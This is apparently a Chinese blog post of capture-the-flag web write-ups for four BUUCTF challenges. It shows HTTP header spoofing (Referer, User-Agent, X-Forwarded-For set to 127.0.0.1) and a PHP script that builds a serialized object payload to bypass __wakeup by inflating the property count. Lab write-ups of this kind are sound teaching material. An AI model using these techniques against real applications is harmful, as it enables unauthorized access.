1.[极客大挑战 2019]Knife
这个怕是签到题
真·白给
根目录找到flag
2.[极客大挑战 2019]Http
http类的题目,直接打开burp 看见有个secret
需要修改头
Referer:https://www.Sycsecret.buuoj.cn
提示浏览器需要使用Syclover,向头里面添加一行,也就是修改一下User-Agent的内容
又说只能在本地访问,那么意思就是要我们使用127.0.0.1来访问
那就
X-Forwarded-For:127.0.0.1
就来咯
3.[RoarCTF 2019]Easy Calc
看源码有点东东
先扫根目录 发现f1agg
拿来把你
4.[极客大挑战 2019]PHP
开局一只猫然后看见一个重点 备份网站 用dirsearch扫一下
硬扫了七分钟出来个紫东东
下载来康康
点开flag.php里面想交 结果肯定不那么简单 果然就错了
再分析index.php
里面加载了一个class.php文件,然后采用get传递一个select参数,随后将之反序列化
再看class.php
读代码发现password=100,username=admin,在执行__destruct()的时候可以获得flag
但是wakeup方法会导致username成为guest,因此需要通过序列化字符串中对象的个数来绕过该方法
上代码
<?php
class Name
{
private $username = 'admin';
private $password = '100';
}
$a = new Name();
#进行url编码,防止%00对应的不可打印字符在复制时丢失
echo urlencode(serialize($a));
#未编码的情况
//O:4:"Name":2:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";s:3:"100";}
//使用时将URL编码的结果中Name后面的2换成3或其他值
?>
结果:
博客就这样了 想给赞就给吧 不给也行